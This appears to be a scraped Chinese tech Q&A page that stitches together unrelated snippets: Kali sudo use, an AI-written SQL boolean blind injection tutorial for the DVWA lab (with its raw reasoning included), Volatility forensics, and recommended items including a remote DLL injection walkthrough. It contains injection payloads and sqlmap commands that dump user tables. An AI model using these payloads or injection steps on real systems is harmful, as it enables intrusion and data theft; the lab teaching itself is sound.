kali语句sudo

时间: 2023-08-23 22:17:14 浏览: 164
回答: 在Kali系统中,使用sudo命令可以获取root权限。如果你是以kali/kali用户登录系统,可以使用以下命令获取root权限: ``` sudo su ``` 执行以上命令后,你将切换到root用户。你可以使用以下命令来设置新的root密码: ``` passwd ``` 这样你就可以为root用户设置一个新的密码了。请注意,为了安全起见,建议设置一个强密码来保护root用户的权限。\[2\] #### 引用[.reference_title] - *1* *2* *3* [Kali系统及Frida环境配置](https://blog.csdn.net/StepTp/article/details/119334433)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
相关问题

用kali

<think>我们正在讨论如何使用KaliLinux进行SQL注入布尔盲注测试,包括靶场环境配置和解题步骤。根据之前的引用,我们知道SQL注入是一种攻击技术,攻击者通过恶意SQL代码插入到查询语句中,绕过安全措施。布尔盲注是SQL注入的一种,当页面没有显示数据库错误信息,但会根据SQL查询结果返回不同页面(真/假)时使用。解题思路:1.环境配置:搭建一个易受SQL注入攻击的靶场,例如DVWA(DamnVulnerableWebApplication)或OWASPJuiceShop。这里以DVWA为例,因为它包含布尔盲注的漏洞。2.使用工具:KaliLinux自带了sqlmap工具,可以自动化进行SQL注入测试,包括布尔盲注。3.手动步骤:为了理解原理,也可以先手动测试,再使用工具。步骤详细说明:一、靶场环境配置(以DVWA为例)1.安装KaliLinux(已安装则跳过)。2.安装DVWA:-需要安装LAMP(Linux,Apache,MySQL,PHP)环境。-下载DVWA:`gitclonehttps://github.com/digininja/DVWA.git`-将DVWA移动到Apache的web目录:`sudomvDVWA/var/www/html/`-设置配置文件:`cd/var/www/html/DVWA/config`,复制`config.inc.php.dist`为`config.inc.php`,并修改其中的数据库连接信息(如用户名、密码,通常为root和对应密码)。-设置文件夹权限:`sudochmod-R755/var/www/html/DVWA`-重启Apache:`sudosystemctlrestartapache2`-在浏览器中访问:`http://localhost/DVWA/setup.php`,点击创建数据库按钮。-登录:默认用户名`admin`,密码`password`。3.设置安全等级:在DVWA中,将安全级别设置为“Low”,以便测试。二、布尔盲注解题步骤(手动)以DVWA的布尔盲注(BlindSQLInjection)为例:1.访问页面:在DVWA中选择“SQLInjectionBlind”模块。2.输入用户ID(例如1),提交。3.观察:正常输入1,返回用户存在。输入一个不存在的ID,返回用户不存在。但即使存在SQL注入,也不会直接显示错误信息。4.手动测试是否存在布尔盲注:-输入:`1'and1=1#`,应返回用户存在(因为条件为真)。-输入:`1'and1=2#`,应返回用户不存在(因为条件为假)。如果符合,说明存在布尔盲注。5.利用布尔盲注获取信息(以获取当前数据库名为例):-猜测数据库名长度:`1'andlength(database())=4#`(假设数据库名长度为4,如果返回存在,则正确)-逐个字符猜测:`1'andsubstring(database(),1,1)='d'#`从第一个字符开始猜,直到猜出整个字符串。这个过程非常耗时,所以通常使用工具。三、使用sqlmap进行自动化布尔盲注测试1.启动KaliLinux,打开终端。2.找到目标URL(以DVWA的布尔盲注页面为例):`http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit`注意:需要带上Cookie(因为DVWA有登录状态)。3.使用sqlmap命令:-先获取Cookie:在浏览器中登录DVWA后,按F12打开开发者工具,在存储中查看Cookie(如`security=low;PHPSESSID=xxx`)。-命令示例(注意替换Cookie):`sqlmap-u"http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit"--cookie="security=low;PHPSESSID=xxx"--batch`参数说明:`-u`:指定URL`--cookie`:传递Cookie`--batch`:使用默认选项,避免交互4.检测注入点:运行上述命令,sqlmap会检测是否存在注入漏洞(包括布尔盲注)。5.获取数据库名:添加`--dbs`参数,获取所有数据库名。6.获取当前数据库:`--current-db`7.获取表名:`-Ddvwa--tables`8.获取列名:`-Ddvwa-Tusers--columns`9.获取数据:`-Ddvwa-Tusers-Cuser,password--dump`注意:在DVWA中,数据库名通常是`dvwa`,表名可能是`users`。四、注意事项1.仅在授权环境下测试。2.理解原理:工具自动化虽然方便,但手动测试有助于深入理解。相关问题:1.布尔盲注和基于时间的盲注有什么区别?2.除了sqlmap,还有哪些工具可以用于SQL注入测试?3.如何防御SQL注入攻击?4.在DVWA中,如何设置不同的安全等级来测试不同难度的SQL注入?引用说明:我们在回答中参考了SQL注入的基本原理和sqlmap的使用方法[^1][^3],以及sqlmap检测和获取数据库的命令示例[^2][^4]。</think>### 在Kali Linux中进行SQL注入布尔盲注测试指南 #### 一、环境配置(靶场搭建) 1. **安装DVWA靶场**(推荐): ```bash git clone https://github.com/digininja/DVWA sudo mv DVWA /var/www/html/ cd /var/www/html/DVWA/config cp config.inc.php.dist config.inc.php # 编辑配置文件设置数据库凭据 sudo systemctl restart apache2 mysql ``` 访问 `http://localhost/DVWA/setup.php` 完成初始化,安全级别设为**Low**[^1]。 2. **启用布尔盲注模块**: - 登录DVWA → SQL Injection (Blind) 模块 - 测试URL示例:`http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit` #### 二、手动布尔盲注步骤 1. **检测漏洞**: ```http http://testvuln.com/products.php?id=1' AND 1=1-- - # 返回正常页面 http://testvuln.com/products.php?id=1' AND 1=2-- - # 返回异常页面 ``` 若响应不同则存在布尔盲注[^3]。 2. **获取数据库名长度**: ```http http://testvuln.com/products.php?id=1' AND LENGTH(DATABASE())=4-- - ``` 通过二分法测试长度(返回正常时长度正确) 3. **逐字符提取数据**(以数据库名首字母为例): ```http http://testvuln.com/products.php?id=1' AND SUBSTR(DATABASE(),1,1)='d'-- - ``` 使用ASCII码加速:`AND ASCII(SUBSTR(DATABASE(),1,1))>97-- -` #### 三、使用sqlmap自动化测试 1. **基础检测**: ```bash sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1" \ --cookie="PHPSESSID=xxx; security=low" --batch --technique=B ``` `--technique=B`指定布尔盲注[^2] 2. **爆破数据库信息**: ```bash sqlmap -u <URL> --cookie=<COOKIE> --dbs # 获取所有数据库名 sqlmap -u <URL> --cookie=<COOKIE> -D dvwa --tables # 获取表名 sqlmap -u <URL> --cookie=<COOKIE> -D dvwa -T users --dump # 提取数据 ``` 3. **高级参数**: ```bash --threads 5 # 加速测试 --level 3 --risk 2 # 提高检测强度 --string="Welcome" # 指定真值页面特征 ``` #### 四、防御建议 1. 输入验证:使用白名单过滤特殊字符 2. 参数化查询:`PDO::prepare()` + 绑定参数 3. 最小权限:数据库账户禁用DROP/UNION权限 4. 错误处理:关闭详细错误回显[^1][^3] > **重要提示**:仅限授权环境测试!真实网站测试需书面授权,否则违法。

kali volatility

### 使用Volatility框架在Kali Linux上进行内存取证分析 #### 安装Volatility 为了确保能够在Kali Linux环境中顺利使用Volatility工具,建议先确认已安装最新版本的Volatility。可以通过包管理器apt-get来完成安装: ```bash sudo apt update && sudo apt install volatility ``` #### 获取并准备内存镜像文件 要对特定设备执行内存取证工作,首先需要获得该目标机器的一个完整的RAM副本作为输入文件给Volatility处理。 #### 配置Profile 由于不同操作系统的内部结构有所差异,在使用Volatility之前必须指定正确的`--profile`参数以匹配被调查的目标系统类型[^1]。这一步骤非常重要,因为它决定了后续能否准确解析内存中的各种数据结构。 例如,当面对Windows 7 SP1 (64位) 的内存转储时,则应采用如下命令行选项: ```bash volatility -f memory_dump.raw --profile=Win7SP1x64 ``` #### 查看可用插件列表 了解有哪些功能模块可供调用可以帮助更高效地开展具体任务。利用内置的帮助文档可以快速浏览所有支持的操作指令集: ```bash volatility -h ``` #### 实际案例应用——提取进程信息 假设现在想要查看某个时刻正在运行的服务及其关联PID等基本信息,那么可以选择运用`pslist`插件实现这一目的: ```bash volatility -f sample_memory.dmp --profile=WinXPSP2x86 pslist ``` 对于Android设备而言,同样遵循上述流程,只是需要注意选择适合安卓平台特性的配置文件。然而值得注意的是,并不是所有的操作系统都已经被完全覆盖和支持;因此遇到特殊情况可能还需要自行创建相应的模板文件用于辅助分析过程。 #### 提取环境变量 针对具体的场景需求,比如获取当时存在的环境变量设置状况,可借助于专门设计好的子命令来进行查询: ```bash volatility -f android_mem.img --profile=LinuxARM envars ``` 这里假定已经找到了适用于所采集到的数据样本的最佳匹配项(即`LinuxARM`),并且将其应用于实际操作之中[^3]。 #### 显示命令行历史记录 有时理解攻击者的行为模式离不开对其交互痕迹的研究,此时便能发挥出诸如`cmdline`这样的实用型组件的作用: ```bash volatility -f windows_memory.dmp --profile=Win7SP1x64 cmdline ``` 此命令将会打印出各个进程中最后一次执行过的shell语句详情[^5]。
阅读全文

相关推荐

最新推荐

recommend-type

GIS安装综合项目施工专项方案.doc

GIS安装综合项目施工专项方案.doc
recommend-type

ASP.NET新闻管理系统:用户管理与内容发布功能

知识点: 1. ASP.NET 概念:ASP.NET 是一个开源、服务器端 Web 应用程序框架,用于构建现代 Web 应用程序。它是 .NET Framework 的一部分,允许开发者使用 .NET 语言(例如 C# 或 VB.NET)来编写网页和 Web 服务。 2. 新闻发布系统功能:新闻发布系统通常具备用户管理、新闻分级、编辑器处理、发布、修改、删除等功能。用户管理指的是系统对不同角色的用户进行权限分配,比如管理员和普通编辑。新闻分级可能是为了根据新闻的重要程度对它们进行分类。编辑器处理涉及到文章内容的编辑和排版,常见的编辑器有CKEditor、TinyMCE等。而发布、修改、删除功能则是新闻发布系统的基本操作。 3. .NET 2.0:.NET 2.0是微软发布的一个较早版本的.NET框架,它是构建应用程序的基础,提供了大量的库和类。它在当时被广泛使用,并支持了大量企业级应用的构建。 4. 文件结构分析:根据提供的压缩包子文件的文件名称列表,我们可以看到以下信息: - www.knowsky.com.txt:这可能是一个文本文件,包含着Knowsky网站的一些信息或者某个页面的具体内容。Knowsky可能是一个技术社区或者文档分享平台,用户可以通过这个链接获取更多关于动态网站制作的资料。 - 源码下载.txt:这同样是一个文本文件,顾名思义,它可能包含了一个新闻系统示例的源代码下载链接或指引。用户可以根据指引下载到该新闻发布系统的源代码,进行学习或进一步的定制开发。 - 动态网站制作指南.url:这个文件是一个URL快捷方式,它指向一个网页资源,该资源可能包含关于动态网站制作的教程、指南或者最佳实践,这对于理解动态网站的工作原理和开发技术将非常有帮助。 - LixyNews:LixyNews很可能是一个项目文件夹,里面包含新闻发布系统的源代码文件。通常,ASP.NET项目会包含多个文件,如.aspx文件(用户界面)、.cs文件(C#代码后台逻辑)、.aspx.cs文件(页面的代码后台)等。这个文件夹中应该还包含Web.config配置文件,它用于配置整个项目的运行参数和环境。 5. 编程语言和工具:ASP.NET主要是使用C#或者VB.NET这两种语言开发的。在该新闻发布系统中,开发者可以使用Visual Studio或其他兼容的IDE来编写、调试和部署网站。 6. 新闻分级和用户管理:新闻分级通常涉及到不同的栏目分类,分类可以是按照新闻类型(如国际、国内、娱乐等),也可以是按照新闻热度或重要性(如头条、焦点等)进行分级。用户管理则是指系统需具备不同的用户身份验证和权限控制机制,保证只有授权用户可以进行新闻的发布、修改和删除等操作。 7. 编辑器处理:一个新闻发布系统的核心组件之一是所使用的Web编辑器。这个编辑器可以是内置的简单文本框,也可以是富文本编辑器(WYSIWYG,即所见即所得编辑器),后者能够提供类似于Word的编辑体验,并能输出格式化后的HTML代码。CKEditor和TinyMCE是常用的开源Web编辑器,它们支持插入图片、视频、表格等多种媒体,并能对文本进行复杂的格式化操作。 8. 发布、修改和删除功能:这是新闻发布系统的基本操作功能。发布功能允许用户将编辑好的新闻内容上线;修改功能可以对已发布的新闻内容进行更新;删除功能则用于移除不再需要的新闻文章。这些操作通常需要后台管理界面来支持,并且系统会在数据库中记录相关操作的记录,以便管理历史版本和审计日志。 以上知识点覆盖了从ASP.NET基础、新闻发布系统的具体功能实现到系统开发过程中的细节处理等多个方面。开发者在构建类似系统时,需要深入了解这些知识点,才能设计和实现一个功能完备、易用、安全的新闻发布系统。
recommend-type

【实战派量化投资秘籍】:Pair Trading策略全方位解析

# 摘要 量化投资中的Pair Trading策略是一种依赖统计套利和市场效率假说的交易方法,其核心在于选择相关性高的资产作为交易对并应用协整理论进行市场中立投资。本文首先概述了Pair Trading策略的理论基础,随后详细探讨了策略的实操技巧,包括数据预处理、模型建立和交易信号生成。接着,文章重点介绍了策略的编程实现,提供了环境搭建
recommend-type

fpga中保持时间建立时间时序约束

<think>我们讨论的是FPGA中的建立时间(Setup Time)和保持时间(Hold Time)时序约束问题。建立时间是指在时钟有效边沿到来之前,数据必须保持稳定的最小时间。保持时间是指在时钟有效边沿到来之后,数据必须保持稳定的最小时间。时序约束就是确保设计满足这些时间要求。 在FPGA设计中,我们通过时序约束(如时钟约束、输入输出延迟约束等)来告知工具设计的时序要求,工具会根据这些约束进行优化和验证。 以下是关于建立时间和保持时间时序约束的详细说明: ### 1. 建立时间和保持时间的基本概念 - **建立时间(Setup Time)**:时钟边沿到达前,数据必须稳定的时间。 -
recommend-type

Notepad2: 高效替代XP系统记事本的多功能文本编辑器

### 知识点详解 #### 标题解析 - **Vista记事本(Notepad2)**: Vista记事本指的是一款名为Notepad2的文本编辑器,它不是Windows Vista系统自带的记事本,而是一个第三方软件,具备高级编辑功能,使得用户在编辑文本文件时拥有更多便利。 - **可以替换xp记事本Notepad**: 这里指的是Notepad2拥有替换Windows XP系统自带记事本(Notepad)的能力,意味着用户可以安装Notepad2来获取更强大的文本处理功能。 #### 描述解析 - **自定义语法高亮**: Notepad2支持自定义语法高亮显示,可以对编程语言如HTML, XML, CSS, JavaScript等进行关键字着色,从而提高代码的可读性。 - **支持多种编码互换**: 用户可以在不同的字符编码格式(如ANSI, Unicode, UTF-8)之间进行转换,确保文本文件在不同编码环境下均能正确显示和编辑。 - **无限书签功能**: Notepad2支持设置多个书签,用户可以根据需要对重要代码行或者文本行进行标记,方便快捷地进行定位。 - **空格和制表符的显示与转换**: 该编辑器可以将空格和制表符以不同颜色高亮显示,便于区分,并且可以将它们互相转换。 - **文本块操作**: 支持使用ALT键结合鼠标操作,进行文本的快速选择和编辑。 - **括号配对高亮显示**: 对于编程代码中的括号配对,Notepad2能够高亮显示,方便开发者查看代码结构。 - **自定义代码页和字符集**: 支持对代码页和字符集进行自定义,以提高对中文等多字节字符的支持。 - **标准正则表达式**: 提供了标准的正则表达式搜索和替换功能,增强了文本处理的灵活性。 - **半透明模式**: Notepad2支持半透明模式,这是一个具有视觉效果的功能,使得用户体验更加友好。 - **快速调整页面大小**: 用户可以快速放大或缩小编辑器窗口,而无需更改字体大小。 #### 替换系统记事本的方法 - **Windows XP/2000系统替换方法**: 首先关闭系统文件保护,然后删除系统文件夹中的notepad.exe,将Notepad2.exe重命名为notepad.exe,并将其复制到C:\Windows和C:\Windows\System32目录下,替换旧的记事本程序。 - **Windows 98系统替换方法**: 直接将重命名后的Notepad2.exe复制到C:\Windows和C:\Windows\System32目录下,替换旧的记事本程序。 #### 关闭系统文件保护的方法 - 通过修改Windows注册表中的"SFCDisable"键值,可以临时禁用Windows系统的文件保护功能。设置键值为"FFFFFF9D"则关闭文件保护,设置为"0"则重新启用。 #### 下载地址 - 提供了Notepad2的下载链接,用户可以通过该链接获取安装包。 #### 文件压缩包内文件名 - **Notepad2MOD1.1.0.8CN.exe**: 这是压缩包内所含的Notepad2编译版本,表明这是一个中文版的安装程序,版本号为1.1.0.8。 ### 总结 Notepad2是一款强大的文本编辑器,它继承了传统的记事本程序界面,同时引入了诸多增强功能,如语法高亮、编码格式转换、书签管理、文本操作快捷键、括号高亮匹配等。这使得它在处理代码、标记语言和其他文本文件时具备极大的优势。用户可以通过替换系统默认记事本的方式,将Notepad2融入到操作系统中,充分享受这些高级功能带来的便捷。同时,提供了关闭系统文件保护的方法,以便用户能够顺利完成替换工作。最后,给出了下载地址,方便用户获取软件安装包。
recommend-type

【mPower1203驱动故障全攻略】:排除新手疑难杂症,提升部署效率

# 1. mPower1203驱动概述与故障诊断基础 在当今信息技术飞速发展的时代,高效准确地诊断和解决驱动故障对于确保企业级IT系统的稳定运行至关重要。mPower1203驱动作为一个广泛应用于高性能计算和数据处理领域的驱动程序,它的稳定性和性能优化对于很多关键业务系统都是不可忽视的。本章节将为您提供一个mPower1203驱动的概述,并对故障诊断的
recommend-type

keil5打不开

<think>我们正在处理Keil 5无法打开的问题。根据引用资料,可能的原因和解决方案如下: 1. 工程路径过长:将工程移动到较短的路径下(如D:\Project)[^3]。 2. 需要安装C51支持包(如果涉及51单片机)[^2]。 3. 编译器配置问题:重新安装或添加ARM编译器[^4]。 4. 软件冲突:以管理员身份运行Keil,并确保安装路径正确。 下面详细说明解决方案:</think>### Keil 5无法打开的解决方法 根据引用资料,Keil 5无法打开通常有以下几种原因及解决方案: #### 1. **工程路径过长问题** [^3] 当工程文件路径嵌套过深时(
recommend-type

远程进程注入技术详解:DLL注入的实现步骤

标题中提到的"RemoteCall"是一种远程进程注入技术,其关键知识点围绕着如何在不直接操作目标进程的情况下,在远程进程内存空间中加载和执行代码。这一技术广泛应用于多个领域,包括但不限于恶意软件开发、安全测试、系统管理工具等。下面,我们将深入探讨这一技术的关键步骤以及涉及的相关技术概念。 ### 进程ID的获取 要对远程进程进行操作,首先需要知道该进程的标识符,即进程ID(Process Identifier,PID)。每个运行中的进程都会被操作系统分配一个唯一的进程ID。通过系统调用或使用各种操作系统提供的工具,如Windows的任务管理器或Linux的ps命令,可以获取到目标进程的PID。 ### 远程进程空间内存分配 进程的内存空间是独立的,一个进程不能直接操作另一个进程的内存空间。要注入代码,需要先在远程进程的内存空间中分配一块内存区域。这一操作通常通过调用操作系统提供的API函数来实现,比如在Windows平台下可以使用VirtualAllocEx函数来在远程进程空间内分配内存。 ### 写入DLL路径到远程内存 分配完内存后,接下来需要将要注入的动态链接库(Dynamic Link Library,DLL)的完整路径字符串写入到刚才分配的内存中。这一步是通过向远程进程的内存写入数据来完成的,同样需要使用到如WriteProcessMemory这样的API函数。 ### 获取Kernel32.dll中的LoadLibrary地址 Kernel32.dll是Windows操作系统中的一个基本的系统级动态链接库,其中包含了许多重要的API函数。LoadLibrary函数用于加载一个动态链接库模块到指定的进程。为了远程调用LoadLibrary函数,必须首先获取到这个函数在远程进程内存中的地址。这一过程涉及到模块句柄的获取和函数地址的解析,可以通过GetModuleHandle和GetProcAddress这两个API函数来完成。 ### 创建远程线程 在有了远程进程的PID、分配的内存地址、DLL文件路径以及LoadLibrary函数的地址后,最后一步是创建一个远程线程来加载DLL。这一步通过调用CreateRemoteThread函数来完成,该函数允许调用者指定一个线程函数地址和一个参数。在这里,线程函数地址就是LoadLibrary函数的地址,参数则是DLL文件的路径。当远程线程启动后,它将在目标进程中执行LoadLibrary函数,从而加载DLL,实现代码注入。 ### 远程进程注入的应用场景与风险 远程进程注入技术的应用场景十分广泛。在系统管理方面,它允许用户向运行中的应用程序添加功能,如插件支持、模块化更新等。在安全领域,安全工具会使用注入技术来提供深度防护或监控。然而,远程进程注入技术也具有极高的风险性,特别是当被用于恶意软件时,它能够被用来注入恶意代码,对用户系统的安全性和稳定性造成威胁。因此,了解这一技术的同时,也必须对其潜在的安全风险有所认识,特别是在进行系统安全防护时,需要对该技术进行检测和防护。 ### 结语 通过对"RemoteCall"远程线程注入技术的知识点分析,我们了解到这一技术的强大能力,以及它在安全测试、系统维护和潜在恶意软件开发中的双重作用。掌握远程进程注入技术不仅要求对操作系统和编程有深入了解,还要求具备应对潜在安全风险的能力。在未来,随着技术的发展和安全挑战的增加,对这类技术的掌握和应用将变得更加重要。
recommend-type

【驱动安装背后的故事】:mPower1203机制深度剖析及优化技巧

# 1. 驱动安装机制概述 ## 简介 驱动安装机制是指操作系统与计算机硬件设备之间交互的过程。这一过程涉及到驱动软件的识别、加载和初始化,确保硬件设备能够在操作系统中正确、高效地运行。本章节将从宏观角度对驱动安装机制进行概述,为深入探讨特定驱动如mPower1203提供基础。 ## 驱动安装的步骤 一
recommend-type

tensorflow2.5.0 linux-aarch64.whl

<think>我们正在寻找适用于Linux AArch64架构的TensorFlow 2.5.0的预编译wheel文件。根据引用[1]和[2],我们知道在AArch64架构上安装TensorFlow可以通过预编译的wheel文件(如果可用)或者从源码编译。但是,用户明确要求wheel文件下载。 然而,请注意: 1. 引用[1]提到从Github下载安装包:tensorflow-on-arm,但该仓库主要提供TensorFlow 1.x版本的预编译包,且文件名中明确有cp35(Python3.5)和aarch64。 2. 引用[2]提到在aarch64上编译安装TensorFlow1.1